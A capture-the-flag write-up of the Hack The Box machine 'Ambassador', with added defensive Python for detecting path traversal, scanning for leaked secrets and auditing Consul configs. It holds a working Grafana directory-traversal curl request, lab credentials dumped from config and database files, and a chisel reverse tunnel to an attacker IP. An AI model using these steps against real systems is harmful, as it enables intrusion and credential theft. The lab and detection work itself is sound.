```text
PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
80/tcp   open  http    Apache httpd 2.4.41 ((Ubuntu))
|_http-generator: Hugo 0.94.2
|_http-title: Ambassador Development Server
|_http-server-header: Apache/2.4.41 (Ubuntu)
3000/tcp open  ppp?
3306/tcp open  mysql   MySQL 8.0.30-0ubuntu0.20.04.2
```
Straight off the bat we get a username from the web server.

We see from the website source that it’s running Hugo 0.94.2, “a static HTML and CSS website generator written in Go”. There’s no immediately obvious CVE, so we carry on. There’s not a lot else obvious here, so next we look at port 3000, which is running another HTTP server.

We find that Grafana versions below 8.3 are vulnerable to LFI (https://www.exploit-db.com/exploits/50581) via directory traversal, so we can read files on the server and begin to explore config files. Inside Grafana’s config file (/etc/grafana/grafana.ini) we find some credentials.
```ini
#################################### Security ####################################
# disable creation of admin user on first start of grafana
;disable_initial_admin_creation = false

# default admin user, created on startup
;admin_user = admin

# default admin password, can be changed before first start of grafana, or in profile settings
admin_password = messageInABottle685427

# used for signing
;secret_key = SW2YcwTIb9zpOOhoPsMm
```

(The split terminal also captured the earlier nc probe of port 3000, which answers with HTTP:)

```text
└─$ nc 10.129.33.213 -v
no port[s] to connect to

┌──(kali㉿kali)-[/htb/ambassador]
└─$ nc 10.129.33.213 3000 -v
ambassador.htb [10.129.33.213] 3000 (?) open
?
HTTP/1.1 400 Bad Request
Content-Type: text/plain; charset=utf-8
Connection: close

400 Bad Request
```
These creds allow us to log in to the Grafana dashboard.

With the same file read we can also dump Grafana’s SQLite database, which holds the MySQL data-source password.
```text
curl --path-as-is http://ambassador.htb:3000/public/plugins/alertlist/../../../../../../../../var/lib/grafana/grafana.db -o grafana.db

sqlite> select * from data_source
   ...> ;
2|1|1|mysql|mysql.yaml|proxy||t|grafana|grafana|0|||0|{}|2022-09-01 22:43:03|2022-10-11 08:34:17|0|{}|1|uKewFgM4z
```
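From the defender’s side, the request above has a very recognisable shape: a path under a static-asset route that climbs out with `..` segments. The following is an added example (not code from the box or from Grafana) that flags such requests in an access log. It assumes the Grafana traffic is written to an Apache/nginx combined-format log, for instance by a reverse proxy in front of port 3000, and the log lines are constructed for the example; it also decodes the path a few times so percent-encoded dots are caught, which the literal request here does not need but a robust detector should handle.

```python
"""Flag path-traversal requests in a combined-format access log (constructed example)."""
import posixpath
import re
from urllib.parse import unquote

# Minimal parser for the Apache/nginx "combined" log format; only the
# client IP, request path and status code are used below.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)

# Constructed sample lines (not taken from the box). The first mirrors the
# curl request above; the third is the same idea with encoded dots.
SAMPLE_LOG = [
    '10.0.0.5 - - [11/Oct/2022:08:34:17 +0000] "GET /public/plugins/alertlist/../../../../../../../../var/lib/grafana/grafana.db HTTP/1.1" 200 741376 "-" "curl/7.85.0"',
    '10.0.0.7 - - [11/Oct/2022:08:35:02 +0000] "GET /public/plugins/alertlist/module.js HTTP/1.1" 200 2048 "-" "Mozilla/5.0"',
    '10.0.0.5 - - [11/Oct/2022:08:36:40 +0000] "GET /public/plugins/alertlist/%2e%2e/%2e%2e/%2e%2e/etc/grafana/grafana.ini HTTP/1.1" 200 5120 "-" "curl/7.85.0"',
    '10.0.0.9 - - [11/Oct/2022:08:37:11 +0000] "GET /login HTTP/1.1" 200 9000 "-" "Mozilla/5.0"',
]


def decode_path(raw: str) -> str:
    """Drop the query string and URL-decode up to three times so that
    %2e%2e and double-encoded %252e%252e both collapse to '..'."""
    path = raw.split("?", 1)[0]
    for _ in range(3):
        decoded = unquote(path)
        if decoded == path:
            break
        path = decoded
    return path


def is_traversal(raw_path: str) -> bool:
    """True when the decoded path contains a '..' segment, i.e. it tries to
    climb out of the directory the handler is meant to serve from."""
    decoded = decode_path(raw_path).replace("\\", "/")
    return ".." in decoded.split("/")


def resolved_target(raw_path: str) -> str:
    """Where the path lands once '..' segments are collapsed. normpath never
    climbs above '/' for an absolute path, matching what the file system does."""
    return posixpath.normpath(decode_path(raw_path).replace("\\", "/"))


def scan_log(lines):
    """Return (client_ip, status, resolved_target) for every traversal attempt."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # unparsable line: skip rather than crash the scan
        if is_traversal(m.group("path")):
            hits.append((m.group("ip"), int(m.group("status")),
                         resolved_target(m.group("path"))))
    return hits


if __name__ == "__main__":
    for ip, status, target in scan_log(SAMPLE_LOG):
        print(f"{ip} status={status} -> {target}")
```

Reporting the resolved target rather than the raw path makes triage faster: a hit on `/var/lib/grafana/grafana.db` or `/etc/grafana/grafana.ini` tells you immediately which secrets to rotate, and a status of 200 on such a request is the signal that the read actually succeeded.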
Using these credentials we can log into the MySQL database on port 3306 and eventually find credentials inside one of the tables.
```text
MySQL [grafana]> use whackywidget;
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A

Database changed
MySQL [whackywidget]> show tables
    -> ;
+------------------------+
| Tables_in_whackywidget |
+------------------------+
| users                  |
+------------------------+
1 row in set (0.024 sec)

MySQL [whackywidget]> select * from users;
+-----------+------------------------------------------+
| user      | pass                                     |
+-----------+------------------------------------------+
| developer | YW5FbmdsaXNoTWFuSW5OZXdZb3JrMDI3NDY4Cg== |
+-----------+------------------------------------------+
1 row in set (0.047 sec)
```

I notice there are some open ports listening internally, one of which is the Consul agent, a process running as root, so I set up a chisel proxy to take a look.

```text
# on the box
developer@ambassador:/tmp$ ./chisel client 10.10.14.53:9999 R:8500:127.0.0.1:8500

# in kali
./chisel server -p 9999 --reverse
```
It appears we don’t have an auth token to run any of the public exploits, so it’s back to digging around.
Inside /opt/my-app we find a .git directory with a Consul token in one of the commits.
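Both credential finds on this box, the active `admin_password` in grafana.ini and the Consul token sitting in git history, are the kind of thing a simple secrets scan catches before an attacker does. The block below is an added example, not code from the box or from any project on it: a rule-based scanner run over constructed text that stands in for `git log -p` output and for the Grafana config. The git sample is invented (placeholder file name, placeholder UUID token) and illustrates the important caveat that a commit which *removes* a hardcoded token still leaves it readable in history; the INI sample reuses the lines shown above.

```python
"""Scan config text and git history output for plaintext secrets (constructed example)."""
import re
from typing import List, Tuple

UUID = r"[0-9a-f]{8}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{12}"

# Ordered rules: the first rule that matches a line wins.
RULES = [
    # Consul ACL tokens are UUIDs; flag one when the word "token" is nearby.
    ("consul-token", re.compile(r"\btoken\b.{0,40}?\b" + UUID + r"\b", re.I)),
    # Active INI credential keys. Lines commented out with ';' or '#' do not
    # match because the key must be the first non-blank thing on the line.
    ("ini-credential", re.compile(r"^\s*(admin_password|secret_key|password)\s*=\s*\S+", re.I)),
    # Generic key=value / key: value assignments with a longish literal.
    ("generic-secret", re.compile(r"\b(password|passwd|secret|api[_-]?key)\s*[:=]\s*['\"]?[^\s'\"]{8,}", re.I)),
]


def scan_text(text: str, diff: bool = False) -> List[Tuple[int, str, str]]:
    """Return (line_number, rule_name, line) for each line that trips a rule.

    With diff=True a leading '+' or '-' is ignored when matching, so secrets on
    removed lines (still present in history) are reported as well."""
    findings = []
    for no, line in enumerate(text.splitlines(), 1):
        body = line[1:] if diff and line[:1] in "+-" else line
        for kind, rx in RULES:
            if rx.search(body):
                findings.append((no, kind, line.strip()))
                break
    return findings


# Constructed `git log -p` excerpt (hypothetical file and placeholder token).
SAMPLE_GIT_LOG = """\
commit aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
Author: Developer <developer@example.invalid>
Date:   Thu Sep 1 12:00:00 2022 +0000

    stop hardcoding the consul token

diff --git a/deploy.sh b/deploy.sh
--- a/deploy.sh
+++ b/deploy.sh
@@ -1,3 +1,3 @@
 #!/bin/bash
-consul kv put --token 00000000-1111-4222-8333-444444444444 app/db/password "$DB_PASSWORD"
+consul kv put --token "$CONSUL_TOKEN" app/db/password "$DB_PASSWORD"
"""

# The Security section of grafana.ini as read from the box (above).
SAMPLE_GRAFANA_INI = """\
#################################### Security ####################################
# disable creation of admin user on first start of grafana
;disable_initial_admin_creation = false
# default admin user, created on startup
;admin_user = admin
# default admin password, can be changed before first start of grafana, or in profile settings
admin_password = messageInABottle685427
# used for signing
;secret_key = SW2YcwTIb9zpOOhoPsMm
"""

if __name__ == "__main__":
    for no, kind, line in scan_text(SAMPLE_GIT_LOG, diff=True):
        print(f"git history line {no} [{kind}]: {line}")
    for no, kind, line in scan_text(SAMPLE_GRAFANA_INI):
        print(f"grafana.ini line {no} [{kind}]: {line}")
```

The git scan reports only the removed `-consul kv put --token …` line: the fix commit is correct, but the token has to be rotated, not just deleted, because anyone with the repository (here, a local user reading /opt/my-app/.git) can still recover it. The INI scan reports `admin_password` and stays quiet on the commented-out defaults.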

With this newly found token, we can try some of the public exploits. The first and most obvious is a Metasploit module.

And just like that we’re root and we get the flag.
For a medium difficulty room it’s very much on the easy side in terms of complexity, but there’s a lot of enumeration and digging to do. A nice room with no significant difficulty spikes.
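The reason a single leaked token is enough for root here is the combination of a Consul agent running as root with an HTTP API that trusts any caller. As an added example (not configuration from the box, and not Consul’s own tooling), the Python below audits a Consul agent JSON config for the two settings that matter most: ACLs enabled with a default-deny policy, and remote script checks switched off. Both configs are constructed; the keys (`acl.enabled`, `acl.default_policy`, `acl.enable_token_persistence`, `enable_script_checks`, `enable_local_script_checks`, `client_addr`) are real Consul agent options, and the defaults noted in the comments are Consul’s documented ones.

```python
"""Audit a Consul agent JSON config for settings that turn a leaked token into code execution (constructed example)."""
import json
from typing import Dict, List

# Constructed agent config resembling a default install: no ACL block,
# script checks switched on.
WEAK_CONFIG = json.loads("""
{
  "datacenter": "dc1",
  "server": true,
  "client_addr": "127.0.0.1",
  "enable_script_checks": true
}
""")

# Constructed hardened config: ACLs on with deny-by-default, no script checks.
HARDENED_CONFIG = json.loads("""
{
  "datacenter": "dc1",
  "server": true,
  "client_addr": "127.0.0.1",
  "enable_script_checks": false,
  "enable_local_script_checks": false,
  "acl": {
    "enabled": true,
    "default_policy": "deny",
    "enable_token_persistence": true
  }
}
""")


def audit_consul_config(cfg: Dict) -> List[str]:
    """Return one message per weak setting; an empty list means the checks passed."""
    findings = []
    acl = cfg.get("acl") or {}
    if not acl.get("enabled", False):
        # ACLs are off by default, so the HTTP API accepts every request as-is.
        findings.append("acl.enabled is false: the HTTP API accepts any request without a token")
    elif acl.get("default_policy", "allow") != "deny":
        # Consul's documented default for default_policy is "allow".
        findings.append("acl.default_policy is not 'deny': requests without a token still get the default grant")
    if cfg.get("enable_script_checks", False):
        # Remote script checks let a service registration carry a command for
        # the agent to run. If script checks are genuinely needed,
        # enable_local_script_checks (config-file registrations only) is the
        # documented safer option.
        findings.append("enable_script_checks is true: service registrations can carry commands the agent executes")
    return findings


if __name__ == "__main__":
    for name, cfg in (("weak", WEAK_CONFIG), ("hardened", HARDENED_CONFIG)):
        problems = audit_consul_config(cfg)
        print(f"{name}: {'OK' if not problems else ''}")
        for p in problems:
            print(f"  - {p}")
```

Binding to 127.0.0.1 (as on this box) is not on the list on purpose: a loopback-only API is still reachable through a tunnel once someone has a shell, as the chisel step shows, so it limits exposure but does not replace ACLs. Running the agent as a dedicated unprivileged user instead of root is the other half of the fix and is outside what the config file expresses.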